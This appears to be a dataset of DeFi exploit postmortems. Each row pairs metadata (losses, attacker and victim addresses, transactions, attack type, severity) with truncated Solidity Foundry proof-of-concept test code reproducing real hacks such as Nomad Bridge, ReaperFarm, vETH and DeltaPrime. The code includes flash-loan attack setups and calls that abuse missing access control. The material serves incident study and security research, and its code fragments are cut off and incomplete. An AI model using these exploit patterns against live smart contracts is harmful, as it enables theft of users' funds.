// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~1.7M US$
// Attacker : 0x5636e55e4a72299a0f194c001841e2ce75bb527a (ReaperFarm Exploiter 1 - who trigger the exploit)
// Attacker : 0x2c177d20b1b1d68cc85d3215904a7bb6629... | exploit_poc | ReaperFarm | 2022-08 | ReaperFarm_exp.sol | null | 591aaa3a64b96251 | 2026-01-07T10:59:16.546086 | postmortems | fantom | 44,045,899 | ~1.7M US$ | 1,700,000 | null | null | null | null | https://twitter.com/Reaper_Farm/status/1554500909740302337 | null | true | true | false | critical | ~1.7M US$ | unknown | function testExploit() public {
address victim = 0x59cb9F088806E511157A6c92B293E5574531022A;
emit log_named_decimal_uint("Victim ReaperUSDCVault balance", ReaperVault.balanceOf(victim), 6);
emit log_named_decimal_uint("Attacker USDC balance", USDC.balanceOf(address(this)), 6);
console.l... | true | ~1.7M US$ | $1.70M | 5.31 | medium | ReaperFarm Exploit (2022-08) | true | false | false | true | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~152M US$
// Attacker(s) : ☠😈👽🤖🐵🌝🤷♂️
// Replica contract mistakenly initialize : 0x53fd92771d2084a9bf39a6477015ef53b7f116c79d98a21be723d06d79024cad
// Example TXs... | exploit_poc | NomadBridge | 2022-08 | NomadBridge_exp.sol | null | 6d18e0ae0f31569b | 2026-01-07T10:59:16.546167 | postmortems | ethereum | 15,259,100 | ~152M US$ | 152,000,000 | null | null | null | null | https://www.certik.com/resources/blog/28fMavD63CpZJOKOjb9DX3-nomad-bridge-exploit-incident-analysis | null | true | true | false | critical | ~152M US$ | unknown | function testExploit() public {
console.log(
"Attackers can copy the original user's transaction calldata and replacing the receive address with a personal one."
);
console.log("We mock how attackers/whitehats replay the calldata at block 15259100\n"); // Txhash : 0xa5fe9d044e4f3e5aa... | true | ~152M US$ | $152.00M | 6.73 | medium | NomadBridge Exploit (2022-08) | true | false | false | true | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "./../interface.sol";
// Pool1: UniswapV2 WETH/USDT
// Pool2: UniswapV2 WETH/XST
// https://tools.blocksec.com/tx/eth/0x873f7c77d5489c1990f701e9bb312c103c5ebcdcf0a472db726730814bfd55f3
contract XSTExpTest is Test {
... | exploit_poc | XST | 2022-08 | XST_exp.sol | null | 4b13f6a0fa4f6c90 | 2026-01-07T10:59:16.546244 | postmortems | unknown | 15,310,016 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
uint256 balance = IERC20(WETH).balanceOf(UniswapV20x694f);
IUniswapV2Pair(UniswapV20x0d4a).swap(balance * 2, 0, address(this), "0000");
uint256 WETHBalance = IERC20(WETH).balanceOf(address(this));
console.log("now my weth num: %s", WETHBalance / 1e18);
... | true | Unknown | 3.71 | low | XST Exploit (2022-08) | false | false | false | false | |||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : $8.5k
// Attacker : https://bscscan.com/address/0x9f2ecec0145242c094b17807f299ce552a625ac5
// Attack Contract : https://bscscan.com/address/0x9b78b5d9febce2b8868ea6ee2822cb482a85ad74
// Vulnerable Contract : ht... | exploit_poc | proxy_b7e1 | 2024-11 | proxy_b7e1_exp.sol | null | 5fe9d6a4581205bb | 2026-01-07T10:59:16.546297 | postmortems | bsc | 44,294,726 | $8.5k | 8,500 | https://bscscan.com/address/0x9f2ecec0145242c094b17807f299ce552a625ac5 | https://bscscan.com/address/0x9b78b5d9febce2b8868ea6ee2822cb482a85ad74 | https://bscscan.com/address/0xb7e1d1372f2880373d7c5a931cdbaa73c38663c6 | https://bscscan.com/tx/0x864d33d006e5c39c9ee8b35be5ae05a2013e556be3e078e2881b0cc6281bb265 | https://x.com/TenArmorAlert/status/1860867560885150050 | https://x.com/TenArmorAlert/status/1860867560885150050 | true | true | false | low | $8.5k | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
// deal(BEP20USDT, address(attC), 8484920000000000000000);
attC.attack();
vm.... | true | $8.5k | https://bscscan.com/address/0x9f2ecec0145242c094b17807f299ce552a625ac5 | https://bscscan.com/address/0x9b78b5d9febce2b8868ea6ee2822cb482a85ad74 | https://bscscan.com/address/0xb7e1d1372f2880373d7c5a931cdbaa73c38663c6 | https://bscscan.com/tx/0x864d33d006e5c39c9ee8b35be5ae05a2013e556be3e078e2881b0cc6281bb265 | https://x.com/TenArmorAlert/status/1860867560885150050 | https://x.com/TenArmorAlert/status/1860867560885150050 | $8.5K | 7.96 | medium | proxy_b7e1 Exploit (2024-11) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 33.7k USD
// Attacker : https://bscscan.com/address/0x2bee9915ddefdc987a42275fbcc39ed178a70aaa
// Attack Contract : https://bscscan.com/address/0x6E088C3dD1055F5dD1660C1c64dE... | exploit_poc | MFT | 2024-11 | MFT_exp.sol | null | 100630baaec17732 | 2026-01-07T10:59:16.546360 | postmortems | bsc | null | 33.7k USD | 33,700 | https://bscscan.com/address/0x2bee9915ddefdc987a42275fbcc39ed178a70aaa | https://bscscan.com/address/0x6E088C3dD1055F5dD1660C1c64dE2af8110B85a8 | https://bscscan.com/address/0x29Ee4526e3A4078Ce37762Dc864424A089Ebba11 | https://bscscan.com/tx/0xe24ee2af7ceee6d6fad1cacda26004adfe0f44d397a17d2aca56c9a01d759142 | null | https://x.com/TenArmorAlert/status/1858351609371406617 | true | true | false | medium | 33.7k USD | unknown | function testExploit() public balanceLog {
//implement exploit code here
AttackContract attackContract = new AttackContract();
vm.prank(MSF_EXPLOITER);
IERC20(MFT_TOKEN).approve(address(attackContract), type(uint256).max);
// Step 0
attackContract.transfer2(MFT_TOKEN, 1... | true | 33.7k USD | https://bscscan.com/address/0x2bee9915ddefdc987a42275fbcc39ed178a70aaa | https://bscscan.com/address/0x6E088C3dD1055F5dD1660C1c64dE2af8110B85a8 | https://bscscan.com/address/0x29Ee4526e3A4078Ce37762Dc864424A089Ebba11 | https://bscscan.com/tx/0xe24ee2af7ceee6d6fad1cacda26004adfe0f44d397a17d2aca56c9a01d759142 | https://x.com/TenArmorAlert/status/1858351609371406617 | $33.7K | 9 | high | MFT Exploit (2024-11) | true | true | true | false | |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : $66K
// Attacker : https://etherscan.io/address/0x3a38877312d1125d2391663cba9f7190953bf2d9
// Attack Contract : https://etherscan.io/address/0x285d37b0480910f977cd43c9bd228527bfad816e, https://etherscan.io/addr... | exploit_poc | MainnetSettler | 2024-11 | MainnetSettler_exp.sol | null | a19a05bcea68d49d | 2026-01-07T10:59:16.546422 | postmortems | ethereum | 21,230,768 | $66K | 66,000 | https://etherscan.io/address/0x3a38877312d1125d2391663cba9f7190953bf2d9 | https://etherscan.io/address/0x285d37b0480910f977cd43c9bd228527bfad816e, | null | https://etherscan.io/tx/0xfab5912f858b3768b7b7d312abcc02b64af7b1e1b62c4f29a2c1a2d1568e9fa2 | https://x.com/TenArmorAlert/status/1859416451473604902 | https://x.com/TenArmorAlert/status/1859416451473604902 | true | true | false | medium | $66K | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", IERC20(hold).balanceOf(attacker), 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
vm.stopPrank();
emit log_named_decimal_uint("after attack: balance of attacker... | true | $66K | https://etherscan.io/address/0x3a38877312d1125d2391663cba9f7190953bf2d9 | https://etherscan.io/address/0x285d37b0480910f977cd43c9bd228527bfad816e, | https://etherscan.io/tx/0xfab5912f858b3768b7b7d312abcc02b64af7b1e1b62c4f29a2c1a2d1568e9fa2 | https://x.com/TenArmorAlert/status/1859416451473604902 | https://x.com/TenArmorAlert/status/1859416451473604902 | $66.0K | 6.5 | medium | MainnetSettler Exploit (2024-11) | true | false | true | true | |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 16.3k USD
// Attacker : https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca
// Attack Contract :
// Vulnerable Contract : https://etherscan.io/address/0x050163597d9905ba66400f7b3ca8f2ef23df7... | exploit_poc | ChiSale | 2024-11 | ChiSale_exp.sol | flash_loan | e86cc3246c0309c3 | 2026-01-07T10:59:16.546467 | postmortems | ethereum | 21,132,838 | 16.3k USD | 16,300 | https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca | null | https://etherscan.io/address/0x050163597d9905ba66400f7b3ca8f2ef23df702d | https://app.blocksec.com/explorer/tx/eth/0x586a2a4368a1a45489a8a9b4273509b524b672c33e6c544d2682771b44f05e87 | https://x.com/TenArmorAlert/status/1854357930382156107 | https://x.com/TenArmorAlert/status/1854357930382156107 | true | true | true | medium | 16.3k USD | flash-loan | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
attC.flashLoan();
vm.stopPrank();
emit log_named_decimal_uint("after attack: ... | true | 16.3k USD | https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca | https://etherscan.io/address/0x050163597d9905ba66400f7b3ca8f2ef23df702d | https://app.blocksec.com/explorer/tx/eth/0x586a2a4368a1a45489a8a9b4273509b524b672c33e6c544d2682771b44f05e87 | https://x.com/TenArmorAlert/status/1854357930382156107 | https://x.com/TenArmorAlert/status/1854357930382156107 | $16.3K | 8.46 | high | ChiSale Exploit (2024-11) | true | true | true | true | |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 8.4K
// Attacker :
// Attack Contract :
// Vulnerable Contract :
// Attack Tx : https://etherscan.io/tx/0x5e151627dc06ec4f2db5be2f48248f320ad3450aba42b1bbd00131bcbaa4f0ae
// @Info
// Vulnerable Contract Cod... | exploit_poc | VRug | 2024-11 | VRug_exp.sol | null | 0cb63c6cec375acd | 2026-01-07T10:59:16.546511 | postmortems | ethereum | 21,138,659 | 8.4K | 8,400 | null | null | null | https://etherscan.io/tx/0x5e151627dc06ec4f2db5be2f48248f320ad3450aba42b1bbd00131bcbaa4f0ae | https://x.com/TenArmorAlert/status/1854702463737380958 | https://x.com/TenArmorAlert/status/1854702463737380958 | true | true | false | low | 8.4K | unknown | function testPoC() public {
vm.startPrank(attacker, attacker);
deal(weth9, address(univ2), 3208323423502347412);
emit log_named_decimal_uint("before attack: balance of mev", IERC20(weth9).balanceOf(mev), 18);
IUniswapV2Pair(univ2).swap(2903872687851807969, 0, address(mev), "");
e... | true | 8.4K | https://etherscan.io/tx/0x5e151627dc06ec4f2db5be2f48248f320ad3450aba42b1bbd00131bcbaa4f0ae | https://x.com/TenArmorAlert/status/1854702463737380958 | https://x.com/TenArmorAlert/status/1854702463737380958 | $8.4K | 5.68 | medium | VRug Exploit (2024-11) | true | false | true | true | |||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 12.9k USD
// Attacker : https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca
// Attack Contract : https://bscscan.com/address/0x54588267066ddbc6f8dcd724d88c25e2838b6374
// Vulnerable Contract ... | exploit_poc | X319 | 2024-11 | X319_exp.sol | null | c048334c4e7dc70e | 2026-01-07T10:59:16.546549 | postmortems | bsc | 43,860,720 | 12.9k USD | 12,900 | https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca | https://bscscan.com/address/0x54588267066ddbc6f8dcd724d88c25e2838b6374 | https://bscscan.com/address/0xedd632eaf3b57e100ae9142e8ed1641e5fd6b2c0 | https://app.blocksec.com/explorer/tx/bsc/0x679028cb0a5af35f57cbea120ec668a5caf72d74fcc6972adc7c75ef6c9a9092 | https://x.com/TenArmorAlert/status/1855263208124416377 | https://x.com/TenArmorAlert/status/1855263208124416377 | true | true | false | medium | 12.9k USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
vm.stopPrank();
emit log_named_decimal_uint("after attack: balance of attacker", addr... | true | 12.9k USD | https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca | https://bscscan.com/address/0x54588267066ddbc6f8dcd724d88c25e2838b6374 | https://bscscan.com/address/0xedd632eaf3b57e100ae9142e8ed1641e5fd6b2c0 | https://app.blocksec.com/explorer/tx/bsc/0x679028cb0a5af35f57cbea120ec668a5caf72d74fcc6972adc7c75ef6c9a9092 | https://x.com/TenArmorAlert/status/1855263208124416377 | https://x.com/TenArmorAlert/status/1855263208124416377 | $12.9K | 6.87 | medium | X319 Exploit (2024-11) | true | true | true | true |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 59K
// Attacker : https://etherscan.io/address/0x00bad13fa32e0000e35b8517e19986b93f000034
// Attack Contract : https://etherscan.io/address/0x67004e26f800c5eb050000200075f049aa0090c3
// Vulnerable Contract : ht... | exploit_poc | CoW | 2024-11 | CoW_exp.sol | null | 74fda9c34aa1555e | 2026-01-07T10:59:16.546593 | postmortems | ethereum | 21,135,438 | 59K | 59,000 | https://etherscan.io/address/0x00bad13fa32e0000e35b8517e19986b93f000034 | https://etherscan.io/address/0x67004e26f800c5eb050000200075f049aa0090c3 | https://etherscan.io/address/0x9008d19f58aabd9ed0d60971565aa8510560ab41 | https://etherscan.io/tx/0x2fc9f2fd393db2273abb9b0451f9a4830aa2ebd5490d453f1a06a8e9e5edc4f9 | https://x.com/TenArmorAlert/status/1854538807854649791 | https://x.com/TenArmorAlert/status/1854538807854649791 | true | true | false | medium | 59K | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
attC.attack();
vm.stopPrank();
emit log_named_decimal_uint("after attack: bal... | true | 59K | https://etherscan.io/address/0x00bad13fa32e0000e35b8517e19986b93f000034 | https://etherscan.io/address/0x67004e26f800c5eb050000200075f049aa0090c3 | https://etherscan.io/address/0x9008d19f58aabd9ed0d60971565aa8510560ab41 | https://etherscan.io/tx/0x2fc9f2fd393db2273abb9b0451f9a4830aa2ebd5490d453f1a06a8e9e5edc4f9 | https://x.com/TenArmorAlert/status/1854538807854649791 | https://x.com/TenArmorAlert/status/1854538807854649791 | $59.0K | 7.33 | medium | CoW Exploit (2024-11) | true | true | true | true |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 10k USD
// Attacker : https://bscscan.com/address/0x5af00b07a55f55775e4d99249dc7d81f5bc14c22
// Attack Contract : https://bscscan.com/address/0x6def9e4a6bb9c3bfe0648a11d3fff14447079e78
// Vulnerable Contract : ... | exploit_poc | NFTG | 2024-11 | NFTG_exp.sol | flash_loan | 6ad331b6d0985aa3 | 2026-01-07T10:59:16.546633 | postmortems | bsc | 44,348,366 | 10k USD | 10,000 | https://bscscan.com/address/0x5af00b07a55f55775e4d99249dc7d81f5bc14c22 | https://bscscan.com/address/0x6def9e4a6bb9c3bfe0648a11d3fff14447079e78 | https://bscscan.com/address/0x5fbbb391d54f4fb1d1cf18310c93d400bc80042e | https://bscscan.com/tx/0xbd330fd17d0f825042474843a223547132a49abb0746a7e762a0b15cf4bd28f6 | https://x.com/TenArmorAlert/status/1861430745572745245 | https://x.com/TenArmorAlert/status/1861430745572745245 | true | true | true | medium | 10k USD | flash-loan | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0x55d398326f99059fF775485246999027B3197955).balanceOf(attacker), 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
attC.transfer();
vm.stopPrank();
... | true | 10k USD | https://bscscan.com/address/0x5af00b07a55f55775e4d99249dc7d81f5bc14c22 | https://bscscan.com/address/0x6def9e4a6bb9c3bfe0648a11d3fff14447079e78 | https://bscscan.com/address/0x5fbbb391d54f4fb1d1cf18310c93d400bc80042e | https://bscscan.com/tx/0xbd330fd17d0f825042474843a223547132a49abb0746a7e762a0b15cf4bd28f6 | https://x.com/TenArmorAlert/status/1861430745572745245 | https://x.com/TenArmorAlert/status/1861430745572745245 | $10.0K | 8.46 | high | NFTG Exploit (2024-11) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ $14.1K
// Attacker : https://bscscan.com/address/0x709b30b69176a3ccc8ef3bb37219267ee2f5b112
// Attack Contract : https://bscscan.com/address/0xfebfe8fbe1cbe2fbdcfb8d37331f2... | exploit_poc | RPP | 2024-11 | RPP_exp.sol | null | f994a7d7e55248ca | 2026-01-07T10:59:16.546683 | postmortems | bsc | null | ~ $14.1K | 14,100 | https://bscscan.com/address/0x709b30b69176a3ccc8ef3bb37219267ee2f5b112 | https://bscscan.com/address/0xfebfe8fbe1cbe2fbdcfb8d37331f2c8afd2a4b45 | https://bscscan.com/address/0x7d1a69302d2a94620d5185f2d80e065454a35751 | https://bscscan.com/tx/0x76c39537374e7fa7f206ed3c99aa6b14ccf1d2dadaabe6139164cc37966e40bd | null | https://x.com/TenArmorAlert/status/1853984974309142768 | true | true | false | medium | ~ $14.1K | unknown | function testExploit() public balanceLog {
AttackContract attackContract = new AttackContract();
attackContract.start();
}
receive() external payable {}
}
contract AttackContract {
address attacker;
uint256 borrowedAmount = 1_200_000_000_000_000_000_000_000;
constructor() {
... | true | ~ $14.1K | https://bscscan.com/address/0x709b30b69176a3ccc8ef3bb37219267ee2f5b112 | https://bscscan.com/address/0xfebfe8fbe1cbe2fbdcfb8d37331f2c8afd2a4b45 | https://bscscan.com/address/0x7d1a69302d2a94620d5185f2d80e065454a35751 | https://bscscan.com/tx/0x76c39537374e7fa7f206ed3c99aa6b14ccf1d2dadaabe6139164cc37966e40bd | https://x.com/TenArmorAlert/status/1853984974309142768 | $14.1K | 7.88 | medium | RPP Exploit (2024-11) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 447k
// Attacker : https://etherscan.io/address/0x351d38733de3f1e73468d24401c59f63677000c9
// Attack Contract : https://etherscan.io/address/0x713d2b652e5f2a86233c57af5341db4... | exploit_poc | vETH | 2024-11 | vETH_exp.sol | flash_loan | f55d540aaef5b978 | 2026-01-07T10:59:16.546732 | postmortems | ethereum | null | 447k | 447,000 | https://etherscan.io/address/0x351d38733de3f1e73468d24401c59f63677000c9 | https://etherscan.io/address/0x713d2b652e5f2a86233c57af5341db42a5559dd1 | https://etherscan.io/address/0x280a8955a11fcd81d72ba1f99d265a48ce39ac2e | https://etherscan.io/tx/0x900891b4540cac8443d6802a08a7a0562b5320444aa6d8eed19705ea6fb9710b | https://blog.verichains.io/p/veth-incident-with-unknown-mechanism | https://x.com/TenArmorAlert/status/1856984299905716645 | true | true | true | high | 447k | flash-loan | function testExploit() public balanceLog {
//implement exploit code here
borrowed_eth = WETH_TOKEN.balanceOf(address(vault));
address[] memory tokens = new address[](1);
tokens[0] = address(WETH_TOKEN);
uint256[] memory amounts = new uint256[](1);
amounts[0] = borrowed_e... | true | 447k | https://etherscan.io/address/0x351d38733de3f1e73468d24401c59f63677000c9 | https://etherscan.io/address/0x713d2b652e5f2a86233c57af5341db42a5559dd1 | https://etherscan.io/address/0x280a8955a11fcd81d72ba1f99d265a48ce39ac2e | https://etherscan.io/tx/0x900891b4540cac8443d6802a08a7a0562b5320444aa6d8eed19705ea6fb9710b | https://blog.verichains.io/p/veth-incident-with-unknown-mechanism | https://x.com/TenArmorAlert/status/1856984299905716645 | $447.0K | 9.16 | high | vETH Exploit (2024-11) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 31.5K USD
// Attacker : https://bscscan.com/address/0xCe21C6e4fa557A9041FA98DFf59A4401Ef0a18aC
// Attack Contract : https://bscscan.com/address/0xbFD7280B11466bc717EB0053A786... | exploit_poc | Ak1111 | 2024-11 | Ak1111_exp.sol | access_control | 3e36994496bd9113 | 2026-01-07T10:59:16.546786 | postmortems | bsc | null | 31.5K USD | 31,500 | https://bscscan.com/address/0xCe21C6e4fa557A9041FA98DFf59A4401Ef0a18aC | https://bscscan.com/address/0xbFD7280B11466bc717EB0053A78675aed2C2E388 | https://bscscan.com/address/0xc3B1b45e5784A8efececfC0BE2E28247d3f49963 | https://bscscan.com/tx/0xc29c98da0c14f4ca436d38f8238f8da1c84c4b1ee6480c4b4facc4b81a013438 | null | https://x.com/TenArmorAlert/status/1860554838897197135 | true | true | true | medium | 31.5K USD | access-control | function testExploit() public balanceLog {
//implement exploit code here
IAk1111 ak1111 = IAk1111(AK1111_ADDR);
uint256 ak1111Balance = ak1111.balanceOf(CAKE_LP);
// this function is lack of access control. anyone call it to mint AK1111 token for free
ak1111.nonblockingLzReceive... | true | 31.5K USD | https://bscscan.com/address/0xCe21C6e4fa557A9041FA98DFf59A4401Ef0a18aC | https://bscscan.com/address/0xbFD7280B11466bc717EB0053A78675aed2C2E388 | https://bscscan.com/address/0xc3B1b45e5784A8efececfC0BE2E28247d3f49963 | https://bscscan.com/tx/0xc29c98da0c14f4ca436d38f8238f8da1c84c4b1ee6480c4b4facc4b81a013438 | https://x.com/TenArmorAlert/status/1860554838897197135 | $31.5K | 8.19 | high | Ak1111 Exploit (2024-11) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : $4.75M
// Attacker : https://arbiscan.io/address/0xb87881637b5c8e6885c51ab7d895e53fa7d7c567
// Attack Contract : https://arbiscan.io/address/0x0b2bcf06f740c322bc7276b6b90d... | exploit_poc | DeltaPrime | 2024-11 | DeltaPrime_exp.sol | flash_loan | 890feb92d9d411b5 | 2026-01-07T10:59:16.546834 | postmortems | arbitrum | 273,278,741 | $4.75M | 4,750,000 | https://arbiscan.io/address/0xb87881637b5c8e6885c51ab7d895e53fa7d7c567 | https://arbiscan.io/address/0x0b2bcf06f740c322bc7276b6b90de08812ce9bfe | https://arbiscan.io/address/0x62cf82fb0484af382714cd09296260edc1dc0c6c | https://arbiscan.io/tx/0x6a2f989b5493b52ffc078d0a59a3bf9727d134b403aa6e0bf309fd513a728f7f | null | null | true | false | true | critical | $4.75M | flash-loan | false | $4.75M | https://arbiscan.io/address/0xb87881637b5c8e6885c51ab7d895e53fa7d7c567 | https://arbiscan.io/address/0x0b2bcf06f740c322bc7276b6b90de08812ce9bfe | https://arbiscan.io/address/0x62cf82fb0484af382714cd09296260edc1dc0c6c | https://arbiscan.io/tx/0x6a2f989b5493b52ffc078d0a59a3bf9727d134b403aa6e0bf309fd513a728f7f | $4.75M | 8 | high | DeltaPrime Exploit (2024-11) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : 80k USD
// Attacker : https://bscscan.com/address/0xd4f04374385341da7333b82b230cd223143c4d62
// Attack Contract : https://bscscan.com/address/0x0aD02ce1b8EB978FD8dc4abeC5bf92Dfa81Ed705
// Vulnerable Co... | exploit_poc | Matez | 2024-11 | Matez_exp.sol | null | d691a68225789328 | 2026-01-07T10:59:16.546907 | postmortems | bsc | null | 80k USD | 80,000 | https://bscscan.com/address/0xd4f04374385341da7333b82b230cd223143c4d62 | https://bscscan.com/address/0x0aD02ce1b8EB978FD8dc4abeC5bf92Dfa81Ed705 | https://bscscan.com/address/0x326FB70eF9e70f8f4c38CFbfaF39F960A5C252fa | https://bscscan.com/tx/0x840b0dc64dbb91e8aba524f67189f639a0bc94ee9256c57d79083bb3fd46ec91 | null | https://x.com/TenArmorAlert/status/1859830885966905670 | true | true | false | medium | 80k USD | unknown | function testExploit() public balanceLog {
//implement exploit code here
// due to the integer truncation problem, the following number will be truncated to 0,
// This flaw allowed the attacker to transfer a zero amount of tokens while
// being recognized by the contract as having stak... | true | 80k USD | https://bscscan.com/address/0xd4f04374385341da7333b82b230cd223143c4d62 | https://bscscan.com/address/0x0aD02ce1b8EB978FD8dc4abeC5bf92Dfa81Ed705 | https://bscscan.com/address/0x326FB70eF9e70f8f4c38CFbfaF39F960A5C252fa | https://bscscan.com/tx/0x840b0dc64dbb91e8aba524f67189f639a0bc94ee9256c57d79083bb3fd46ec91 | https://x.com/TenArmorAlert/status/1859830885966905670 | $80.0K | 7.33 | medium | Matez Exploit (2024-11) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
interface IAggregationRouter {
struct SwapParams {
address srcToken;
address dstToken;
uint256 amount;
address payable executor;
bytes executeParams;
bytes extraData;
}
... | exploit_poc | Kame | 2025-09 | Kame_exp.sol | null | c41444eada1d81c7 | 2026-01-07T10:59:16.546953 | postmortems | unknown | null | 18167.880000 USD | 18,167.88 | https://seiscan.io//address/0xd43d0660601e613f9097d5c75cd04ee0c19e6f65 | null | https://seiscan.io//address/0x14bb98581ac1f1a43fd148db7d7d793308dc4d80 | https://seiscan.io//tx/0x6150ec6b2b1b46d1bcba0cab9c3a77b5bca218fd1cdaad1ddc7a916e4ce792ec | null | https://x.com/SupremacyHQ/status/1966909841483636849 | true | true | false | medium | 18167.880000 USD | unknown | function testExploit() public balanceLog {
router.swap(createSwapParams(syUSD, USDC, targetToTakeFrom));
} | true | 18167.880000 USD | https://seiscan.io//address/0xd43d0660601e613f9097d5c75cd04ee0c19e6f65 | https://seiscan.io//address/0x14bb98581ac1f1a43fd148db7d7d793308dc4d80 | https://seiscan.io//tx/0x6150ec6b2b1b46d1bcba0cab9c3a77b5bca218fd1cdaad1ddc7a916e4ce792ec | https://x.com/SupremacyHQ/status/1966909841483636849 | $18.2K | 7.34 | medium | Kame Exploit (2025-09) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1647307128267476992
// https://twitter.com/danielvf/status/1647329491788677121
// https://twitter.com/hexagate_/status/1647334970258608131
// ... | exploit_poc | HundredFinance_2 | 2023-04 | HundredFinance_2_exp.sol | flash_loan | 8b9068a3b9474214 | 2026-01-07T10:59:16.547011 | postmortems | ethereum | 90,760,765 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 4 | low | HundredFinance_2 Exploit (2023-04) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BeosinAlert/status/1642372700726505473
// @Tx
// https://bscscan.com/tx/0x7ff1364c3b3b296b411965339ed956da5d17058f3164425ce800d64f1aef8210
interface IPool {
... | exploit_poc | Allbridge | 2023-04 | Allbridge_exp.sol | flash_loan | a6fda2dc504b0dd2 | 2026-01-07T10:59:16.547102 | postmortems | bsc | 26,982,067 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 3.17 | low | Allbridge Exploit (2023-04) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import {
ICErc20Delegate,
IERC20,
IUnitroller,
IAaveFlashloan,
IBalancerVault,
Uni_Pair_V2,
Uni_Pair_V3
} from "./../interface.sol";
// @KeyInfo
// Project: https://twitter.com/0vixProtocol
// Date... | exploit_poc | 0vix | 2023-04 | 0vix_exp.sol | flash_loan | 99a3dc950cef7074 | 2026-01-07T10:59:16.547170 | postmortems | polygon | 42,054,768 | ~@2M US$ | 2,000,000 | null | null | null | https://polygonscan.com/tx/0x10f2c28f5d6cd8d7b56210b4d5e0cece27e45a30808cd3d3443c05d4275bb008 | null | null | true | false | true | critical | ~@2M US$ | flash-loan | false | https://polygonscan.com/tx/0x10f2c28f5d6cd8d7b56210b4d5e0cece27e45a30808cd3d3443c05d4275bb008 | $2.00M | 7 | medium | 0vix Exploit (2023-04) | true | false | true | false | |||||||
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
import "forge-std/console.sol";
import "./../interface.sol";
// It's a postmortem, now it's disclosed, just for studying.
// analysis and code: https://medium.com/immunefi/silo-finance-logic-error-bugfix-review-35de29bd934a
interface ISilo {
function deposit(... | exploit_poc | silo_finance | 2023-04 | silo_finance_exp.sol | null | 14a16c9bde54cfd9 | 2026-01-07T10:59:16.547296 | postmortems | unknown | 17,139,470 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testAttack() public {
address LINK = 0x514910771AF9Ca656af840dff83E8264EcF986CA;
address WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
console.log("time stamp before = ", block.timestamp);
console.log("block number before = ", block.number);
siloBugFixReview.run()... | true | Unknown | 5 | medium | silo_finance Exploit (2023-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
